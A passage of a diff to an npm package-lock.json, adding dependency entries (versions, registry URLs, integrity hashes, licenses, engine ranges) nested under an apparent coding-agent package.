+			"integrity": "sha512-Ep/7tPamGY8mgESE3LyLKtxJyy6U52WWAqr/3wial47Sj4u3PiIF73AOGI27UyLy9duTkhZbgzodOfLV4TduZg==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@aws-crypto/crc32": "5.2.0",
+				"@smithy/types": "^4.14.2",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=18.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@smithy/credential-provider-imds": {
+			"version": "4.3.3",
+			"resolved": "https://registry.npmjs.org/@smithy/credential-provider-imds/-/credential-provider-imds-4.3.3.tgz",
+			"integrity": "sha512-I2Bti0DKFo2IJyN28ijCsx51BAumEYR4/1yZ1FXyBygy9MqbnMqCev4JPth/MbpRfBSRAX35hITSnAdJRo1u5w==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@smithy/core": "^3.24.3",
+				"@smithy/types": "^4.14.2",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=18.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@smithy/fetch-http-handler": {
+			"version": "5.4.3",
+			"resolved": "https://registry.npmjs.org/@smithy/fetch-http-handler/-/fetch-http-handler-5.4.3.tgz",
+			"integrity": "sha512-F+DRf8IJazRJgYog2A/yJK7eYVc0rqTlRzO+5ZxjJd4WkZoKz0IJRncf7G6t1pdVT3kryJcwuTFhN1c5m6N47A==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@smithy/core": "^3.24.3",
+				"@smithy/types": "^4.14.2",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=18.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@smithy/is-array-buffer": {
+			"version": "2.2.0",
+			"resolved": "https://registry.npmjs.org/@smithy/is-array-buffer/-/is-array-buffer-2.2.0.tgz",
+			"integrity": "sha512-GGP3O9QFD24uGeAXYUjwSTXARoqpZykHadOmA8G5vfJPK0/DC67qa//0qvqrJzL1xc8WQWX7/yc7fwudjPHPhA==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=14.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@smithy/node-http-handler": {
+			"version": "4.7.3",
+			"resolved": "https://registry.npmjs.org/@smithy/node-http-handler/-/node-http-handler-4.7.3.tgz",
+			"integrity": "sha512-/jPhevcTFPMVl6KNjbaI47iOg1zxC7IsnX4PQDGVZKMFceOXtB8IEYaB7a9VvkP/3oC60WzTeKocvSI7vLT0vA==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@smithy/core": "^3.24.3",
+				"@smithy/types": "^4.14.2",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=18.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@smithy/signature-v4": {
+			"version": "5.4.3",
+			"resolved": "https://registry.npmjs.org/@smithy/signature-v4/-/signature-v4-5.4.3.tgz",
+			"integrity": "sha512-53+75QuPl6DL+ct6vVEB51FDO5oulXr20TPV46VvJZg76lIlXNWfxi8j+G2V/t0I2qxCBOa3vX/8bmjrpFVo9g==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@smithy/core": "^3.24.3",
+				"@smithy/types": "^4.14.2",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=18.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@smithy/types": {
+			"version": "4.14.2",
+			"resolved": "https://registry.npmjs.org/@smithy/types/-/types-4.14.2.tgz",
+			"integrity": "sha512-P+otAxbV4CqBybp7EkcJCrig63yE2E7PuNVOmilVMRcx/O+QDzGULTrKsq4DV13gSfak9ObPrWaHl/9bL5YcWw==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=18.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@smithy/util-buffer-from": {
+			"version": "2.2.0",
+			"resolved": "https://registry.npmjs.org/@smithy/util-buffer-from/-/util-buffer-from-2.2.0.tgz",
+			"integrity": "sha512-IJdWBbTcMQ6DA0gdNhh/BwrLkDR+ADW5Kr1aZmd4k3DIF6ezMV4R2NIAmT08wQJ3yUK82thHWmC/TnK/wpMMIA==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@smithy/is-array-buffer": "^2.2.0",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=14.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@smithy/util-utf8": {
+			"version": "2.3.0",
+			"resolved": "https://registry.npmjs.org/@smithy/util-utf8/-/util-utf8-2.3.0.tgz",
+			"integrity": "sha512-R8Rdn8Hy72KKcebgLiv8jQcQkXoLMOGGv5uI1/k0l+snqkOzQ1R0ChUBCxWMlBsFMekWjq0wRudIweFs7sKT5A==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@smithy/util-buffer-from": "^2.2.0",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=14.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@types/node": {
+			"version": "22.19.19",
+			"resolved": "https://registry.npmjs.org/@types/node/-/node-22.19.19.tgz",
+			"integrity": "sha512-dyh/xO2Fh5bYrfWaaqGrRQQGkNdmYw6AmaAUvYeUMNTWQtvb796ikLdmTchRmOlOiIJ1TDXfWgVx1QkUlQ6Hew==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"undici-types": "~6.21.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/agent-base": {
+			"version": "7.1.4",
+			"resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.4.tgz",
+			"integrity": "sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"engines": {
+				"node": ">= 14"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/balanced-match": {
+			"version": "4.0.4",
+			"resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-4.0.4.tgz",
+			"integrity": "sha512-BLrgEcRTwX2o6gGxGOCNyMvGSp35YofuYzw9h1IMTRmKqttAZZVU67bdb9Pr2vUHA8+j3i2tJfjO6C6+4myGTA==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"engines": {
+				"node": "18 || 20 || >=22"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/base64-js": {
+			"version": "1.5.1",
+			"resolved": "https://registry.npmjs.org/base64-js/-/base64-js-1.5.1.tgz",
+			"integrity": "sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==",
+			"dev": true,
+			"funding": [
+				{
+					"type": "github",
+					"url": "https://github.com/sponsors/feross"
+				},
+				{
+					"type": "patreon",
+					"url": "https://www.patreon.com/feross"
+				},
+				{
+					"type": "consulting",
+					"url": "https://feross.org/support"
+				}
+			],
+			"license": "MIT",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/bignumber.js": {
+			"version": "9.3.1",
+			"resolved": "https://registry.npmjs.org/bignumber.js/-/bignumber.js-9.3.1.tgz",
+			"integrity": "sha512-Ko0uX15oIUS7wJ3Rb30Fs6SkVbLmPBAKdlm7q9+ak9bbIeFf0MwuBsQV6z7+X768/cHsfg+WlysDWJcmthjsjQ==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"engines": {
+				"node": "*"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/bowser": {
+			"version": "2.14.1",
+			"resolved": "https://registry.npmjs.org/bowser/-/bowser-2.14.1.tgz",
+			"integrity": "sha512-tzPjzCxygAKWFOJP011oxFHs57HzIhOEracIgAePE4pqB3LikALKnSzUyU4MGs9/iCEUuHlAJTjTc5M+u7YEGg==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/brace-expansion": {
+			"version": "5.0.7",
+			"resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-5.0.7.tgz",
+			"integrity": "sha512-7oFy703dxfY3/NLxC1fh2SUCQ0H9rmAY+5EpDVfXjUTTs+HEwR2nYaqLv+GWcTsumwxPfiz6CzCNkwXwBUwqCA==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"balanced-match": "^4.0.2"
+			},
+			"engines": {
+				"node": "18 || 20 || >=22"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/buffer-equal-constant-time": {
+			"version": "1.0.1",
+			"resolved": "https://registry.npmjs.org/buffer-equal-constant-time/-/buffer-equal-constant-time-1.0.1.tgz",
+			"integrity": "sha512-zRpUiDwd/xk6ADqPMATG8vc9VPrkck7T07OIx0gnjmJAnHnTVXNQG3vfvWNuiZIkwu9KrKdA1iJKfsfTVxE6NA==",
+			"dev": true,
+			"license": "BSD-3-Clause",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/chalk": {
+			"version": "5.6.2",
+			"resolved": "https://registry.npmjs.org/chalk/-/chalk-5.6.2.tgz",
+			"integrity": "sha512-7NzBL0rN6fMUW+f7A6Io4h40qQlG+xGmtMxfbnH/K7TAtt8JQWVQK+6g0UXKMeVJoyV5EkkNsErQ8pVD3bLHbA==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"engines": {
+				"node": "^12.17.0 || ^14.13 || >=16.0.0"
+			},
+			"funding": {
+				"url": "https://github.com/chalk/chalk?sponsor=1"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/cross-spawn": {
+			"version": "7.0.6",
+			"resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz",
+			"integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"path-key": "^3.1.0",
+				"shebang-command": "^2.0.0",
+				"which": "^2.0.1"
+			},
+			"engines": {
+				"node": ">= 8"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/data-uri-to-buffer": {
+			"version": "4.0.1",
+			"resolved": "https://registry.npmjs.org/data-uri-to-buffer/-/data-uri-to-buffer-4.0.1.tgz",
+			"integrity": "sha512-0R9ikRb668HB7QDxT1vkpuUBtqc53YyAwMwGeUFKRojY/NWKvdZ+9UYtRfGmhqNbRkTSVpMbmyhXipFFv2cb/A==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"engines": {
+				"node": ">= 12"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/debug": {
+			"version": "4.4.3",
+			"resolved": "https://registry.npmjs.org/debug/-/debug-4.4.3.tgz",
+			"integrity": "sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"ms": "^2.1.3"
+			},
+			"engines": {
+				"node": ">=6.0"
+			},
+			"peerDependenciesMeta": {
+				"supports-color": {
+					"optional": true
+				}
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/diff": {
+			"version": "8.0.4",
+			"resolved": "https://registry.npmjs.org/diff/-/diff-8.0.4.tgz",
+			"integrity": "sha512-DPi0FmjiSU5EvQV0++GFDOJ9ASQUVFh5kD+OzOnYdi7n3Wpm9hWWGfB/O2blfHcMVTL5WkQXSnRiK9makhrcnw==",
+			"dev": true,
+			"license": "BSD-3-Clause",
+			"peer": true,
+			"engines": {
+				"node": ">=0.3.1"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/ecdsa-sig-formatter": {
+			"version": "1.0.11",
+			"resolved": "https://registry.npmjs.org/ecdsa-sig-formatter/-/ecdsa-sig-formatter-1.0.11.tgz",
+			"integrity": "sha512-nagl3RYrbNv6kQkeJIpt6NJZy8twLB/2vtz6yN9Z4vRKHN4/QZJIEbqohALSgwKdnksuY3k5Addp5lg8sVoVcQ==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"safe-buffer": "^5.0.1"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/extend": {
+			"version": "3.0.2",
+			"resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz",
+			"integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/fast-xml-builder": {
+			"version": "1.2.0",
+			"resolved": "https://registry.npmjs.org/fast-xml-builder/-/fast-xml-builder-1.2.0.tgz",
+			"integrity": "sha512-00aAWieqff+ZJhsXA4g1g7M8k+7AYoMUUHF+/zFb5U6Uv/P0Vl4QZo84/IcufzYalLuEj9928bXN9PbbFzMF0Q==",
+			"dev": true,
+			"funding": [
+				{
+					"type": "github",
+					"url": "https://github.com/sponsors/NaturalIntelligence"
+				}
+			],
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"path-expression-matcher": "^1.5.0",
+				"xml-naming": "^0.1.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/fast-xml-parser": {
+			"version": "5.7.3",
+			"resolved": "https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-5.7.3.tgz",
+			"integrity": "sha512-C0AaNuC+mscy6vrAQKAc/rMq+zAPHodfHGZu4sGVehvAQt/JLG1O5zEcYcXSY5zSqr4YVgxsB+pHXTq0i7eDlg==",
+			"dev": true,
+			"funding": [
+				{
+					"type": "github",
+					"url": "https://github.com/sponsors/NaturalIntelligence"
+				}
+			],
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"@nodable/entities": "^2.1.0",
+				"fast-xml-builder": "^1.1.7",
+				"path-expression-matcher": "^1.5.0",
+				"strnum": "^2.2.3"
+			},
+			"bin": {
+				"fxparser": "src/cli/cli.js"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/fetch-blob": {
+			"version": "3.2.0",
+			"resolved": "https://registry.npmjs.org/fetch-blob/-/fetch-blob-3.2.0.tgz",
+			"integrity": "sha512-7yAQpD2UMJzLi1Dqv7qFYnPbaPx7ZfFK6PiIxQ4PfkGPyNyl2Ugx+a/umUonmKqjhM4DnfbMvdX6otXq83soQQ==",
+			"dev": true,
+			"funding": [
+				{
+					"type": "github",
+					"url": "https://github.com/sponsors/jimmywarting"
+				},
+				{
+					"type": "paypal",
+					"url": "https://paypal.me/jimmywarting"
+				}
+			],
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"node-domexception": "^1.0.0",
+				"web-streams-polyfill": "^3.0.3"
+			},
+			"engines": {
+				"node": "^12.20 || >= 14.13"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/formdata-polyfill": {
+			"version": "4.0.10",
+			"resolved": "https://registry.npmjs.org/formdata-polyfill/-/formdata-polyfill-4.0.10.tgz",
+			"integrity": "sha512-buewHzMvYL29jdeQTVILecSaZKnt/RJWjoZCF5OW60Z67/GmSLBkOFM7qh1PI3zFNtJbaZL5eQu1vLfazOwj4g==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"fetch-blob": "^3.1.2"
+			},
+			"engines": {
+				"node": ">=12.20.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/gaxios": {
+			"version": "7.1.4",
+			"resolved": "https://registry.npmjs.org/gaxios/-/gaxios-7.1.4.tgz",
+			"integrity": "sha512-bTIgTsM2bWn3XklZISBTQX7ZSddGW+IO3bMdGaemHZ3tbqExMENHLx6kKZ/KlejgrMtj8q7wBItt51yegqalrA==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"extend": "^3.0.2",
+				"https-proxy-agent": "^7.0.1",
+				"node-fetch": "^3.3.2"
+			},
+			"engines": {
+				"node": ">=18"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/gcp-metadata": {
+			"version": "8.1.2",
+			"resolved": "https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-8.1.2.tgz",
+			"integrity": "sha512-zV/5HKTfCeKWnxG0Dmrw51hEWFGfcF2xiXqcA3+J90WDuP0SvoiSO5ORvcBsifmx/FoIjgQN3oNOGaQ5PhLFkg==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"gaxios": "^7.0.0",
+				"google-logging-utils": "^1.0.0",
+				"json-bigint": "^1.0.0"
+			},
+			"engines": {
+				"node": ">=18"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/get-east-asian-width": {
+			"version": "1.6.0",
+			"resolved": "https://registry.npmjs.org/get-east-asian-width/-/get-east-asian-width-1.6.0.tgz",
+			"integrity": "sha512-QRbvDIbx6YklUe6RxeTeleMR0yv3cYH6PsPZHcnVn7xv7zO1BHN8r0XETu8n6Ye3Q+ahtSarc3WgtNWmehIBfA==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"engines": {
+				"node": ">=18"
+			},
+			"funding": {
+				"url": "https://github.com/sponsors/sindresorhus"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/glob": {
+			"version": "13.0.6",
+			"resolved": "https://registry.npmjs.org/glob/-/glob-13.0.6.tgz",
+			"integrity": "sha512-Wjlyrolmm8uDpm/ogGyXZXb1Z+Ca2B8NbJwqBVg0axK9GbBeoS7yGV6vjXnYdGm6X53iehEuxxbyiKp8QmN4Vw==",
+			"dev": true,
+			"license": "BlueOak-1.0.0",
+			"peer": true,
+			"dependencies": {
+				"minimatch": "^10.2.2",
+				"minipass": "^7.1.3",
+				"path-scurry": "^2.0.2"
+			},
+			"engines": {
+				"node": "18 || 20 || >=22"
+			},
+			"funding": {
+				"url": "https://github.com/sponsors/isaacs"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/google-auth-library": {
+			"version": "10.6.2",
+			"resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-10.6.2.tgz",
+			"integrity": "sha512-e27Z6EThmVNNvtYASwQxose/G57rkRuaRbQyxM2bvYLLX/GqWZ5chWq2EBoUchJbCc57eC9ArzO5wMsEmWftCw==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"base64-js": "^1.3.0",
+				"ecdsa-sig-formatter": "^1.0.11",
+				"gaxios": "^7.1.4",
+				"gcp-metadata": "8.1.2",
+				"google-logging-utils": "1.1.3",
+				"jws": "^4.0.0"
+			},
+			"engines": {
+				"node": ">=18"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/google-logging-utils": {
+			"version": "1.1.3",
+			"resolved": "https://registry.npmjs.org/google-logging-utils/-/google-logging-utils-1.1.3.tgz",
+			"integrity": "sha512-eAmLkjDjAFCVXg7A1unxHsLf961m6y17QFqXqAXGj/gVkKFrEICfStRfwUlGNfeCEjNRa32JEWOUTlYXPyyKvA==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"engines": {
+				"node": ">=14"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/graceful-fs": {
+			"version": "4.2.11",
+			"resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz",
+			"integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==",
+			"dev": true,
+			"license": "ISC",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/highlight.js": {
+			"version": "10.7.3",
+			"resolved": "https://registry.npmjs.org/highlight.js/-/highlight.js-10.7.3.tgz",
+			"integrity": "sha512-tzcUFauisWKNHaRkN4Wjl/ZA07gENAjFl3J/c480dprkGTg5EQstgaNFqBfUqCq54kZRIEcreTsAgF/m2quD7A==",
+			"dev": true,
+			"license": "BSD-3-Clause",
+			"peer": true,
+			"engines": {
+				"node": "*"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/hosted-git-info": {
+			"version": "9.0.3",
+			"resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-9.0.3.tgz",
+			"integrity": "sha512-Hc+ghLoSt6QaYZUv0WBiIvmMDZuZZ7oaDvdH8MbfOO4lOsxdXLEvuC6ePoGs9H1X9oCLyq6+NVN0MKqD+ydxyg==",
+			"dev": true,
+			"license": "ISC",
+			"peer": true,
+			"dependencies": {
+				"lru-cache": "^11.1.0"
+			},
+			"engines": {
+				"node": "^20.17.0 || >=22.9.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/http-proxy-agent": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/http-proxy-agent/-/http-proxy-agent-7.0.2.tgz",
+			"integrity": "sha512-T1gkAiYYDWYx3V5Bmyu7HcfcvL7mUrTWiM6yOfa3PIphViJ/gFPbvidQ+veqSOHci/PxBcDabeUNCzpOODJZig==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"agent-base": "^7.1.0",
+				"debug": "^4.3.4"
+			},
+			"engines": {
+				"node": ">= 14"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/https-proxy-agent": {
+			"version": "7.0.6",
+			"resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.6.tgz",
+			"integrity": "sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"agent-base": "^7.1.2",
+				"debug": "4"
+			},
+			"engines": {
+				"node": ">= 14"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/ignore": {
+			"version": "7.0.5",
+			"resolved": "https://registry.npmjs.org/ignore/-/ignore-7.0.5.tgz",
+			"integrity": "sha512-Hs59xBNfUIunMFgWAbGX5cq6893IbWg4KnrjbYwX3tx0ztorVgTDA6B2sxf8ejHJ4wz8BqGUMYlnzNBer5NvGg==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"engines": {
+				"node": ">= 4"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/isexe": {
+			"version": "2.0.0",
+			"resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz",
+			"integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==",
+			"dev": true,
+			"license": "ISC",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/jiti": {
+			"version": "2.7.0",
+			"resolved": "https://registry.npmjs.org/jiti/-/jiti-2.7.0.tgz",
+			"integrity": "sha512-AC/7JofJvZGrrneWNaEnJeOLUx+JlGt7tNa0wZiRPT4MY1wmfKjt2+6O2p2uz2+skll8OZZmJMNqeke7kKbNgQ==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"bin": {
+				"jiti": "lib/jiti-cli.mjs"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/json-bigint": {
+			"version": "1.0.0",
+			"resolved": "https://registry.npmjs.org/json-bigint/-/json-bigint-1.0.0.tgz",
+			"integrity": "sha512-SiPv/8VpZuWbvLSMtTDU8hEfrZWg/mH/nV/b4o0CYbSxu1UIQPLdwKOCIyLQX+VIPO5vrLX3i8qtqFyhdPSUSQ==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"bignumber.js": "^9.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/json-schema-to-ts": {
+			"version": "3.1.1",
+			"resolved": "https://registry.npmjs.org/json-schema-to-ts/-/json-schema-to-ts-3.1.1.tgz",
+			"integrity": "sha512-+DWg8jCJG2TEnpy7kOm/7/AxaYoaRbjVB4LFZLySZlWn8exGs3A4OLJR966cVvU26N7X9TWxl+Jsw7dzAqKT6g==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"@babel/runtime": "^7.18.3",
+				"ts-algebra": "^2.0.0"
+			},
+			"engines": {
+				"node": ">=16"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/jwa": {
+			"version": "2.0.1",
+			"resolved": "https://registry.npmjs.org/jwa/-/jwa-2.0.1.tgz",
+			"integrity": "sha512-hRF04fqJIP8Abbkq5NKGN0Bbr3JxlQ+qhZufXVr0DvujKy93ZCbXZMHDL4EOtodSbCWxOqR8MS1tXA5hwqCXDg==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"buffer-equal-constant-time": "^1.0.1",
+				"ecdsa-sig-formatter": "1.0.11",
+				"safe-buffer": "^5.0.1"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/jws": {
+			"version": "4.0.1",
+			"resolved": "https://registry.npmjs.org/jws/-/jws-4.0.1.tgz",
+			"integrity": "sha512-EKI/M/yqPncGUUh44xz0PxSidXFr/+r0pA70+gIYhjv+et7yxM+s29Y+VGDkovRofQem0fs7Uvf4+YmAdyRduA==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"jwa": "^2.0.1",
+				"safe-buffer": "^5.0.1"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/long": {
+			"version": "5.3.2",
+			"resolved": "https://registry.npmjs.org/long/-/long-5.3.2.tgz",
+			"integrity": "sha512-mNAgZ1GmyNhD7AuqnTG3/VQ26o760+ZYBPKjPvugO8+nLbYfX6TVpJPseBvopbdY+qpZ/lKUnmEc1LeZYS3QAA==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/lru-cache": {
+			"version": "11.4.0",
+			"resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-11.4.0.tgz",
+			"integrity": "sha512-W+R+kFL4HgVxONq2bhXPi3bGpzGe/yEhVOp233qw9wCRtgncJ15P3bC+e4zZMu4Cq7d+WAJjXGW0uUkifhcatA==",
+			"dev": true,
+			"license": "BlueOak-1.0.0",
+			"peer": true,
+			"engines": {
+				"node": "20 || >=22"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/marked": {
+			"version": "18.0.5",
+			"resolved": "https://registry.npmjs.org/marked/-/marked-18.0.5.tgz",
+			"integrity": "sha512-S6GcvALHg6K4ohtu4E7x0a1AqhAjp6cV8KhLSyN9qVapnzJkusVBxZRcIU9AeYsbe6P1hKDusSbEOzGyyuce6w==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"bin": {
+				"marked": "bin/marked.js"
+			},
+			"engines": {
+				"node": ">= 20"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/minimatch": {
+			"version": "10.2.5",
+			"resolved": "https://registry.npmjs.org/minimatch/-/minimatch-10.2.5.tgz",
+			"integrity": "sha512-MULkVLfKGYDFYejP07QOurDLLQpcjk7Fw+7jXS2R2czRQzR56yHRveU5NDJEOviH+hETZKSkIk5c+T23GjFUMg==",
+			"dev": true,
+			"license": "BlueOak-1.0.0",
+			"peer": true,
+			"dependencies": {
+				"brace-expansion": "^5.0.5"
+			},
+			"engines": {
+				"node": "18 || 20 || >=22"
+			},
+			"funding": {
+				"url": "https://github.com/sponsors/isaacs"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/minipass": {
+			"version": "7.1.3",
+			"resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz",
+			"integrity": "sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==",
+			"dev": true,
+			"license": "BlueOak-1.0.0",
+			"peer": true,
+			"engines": {
+				"node": ">=16 || 14 >=14.17"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/ms": {
+			"version": "2.1.3",
+			"resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz",
+			"integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==",
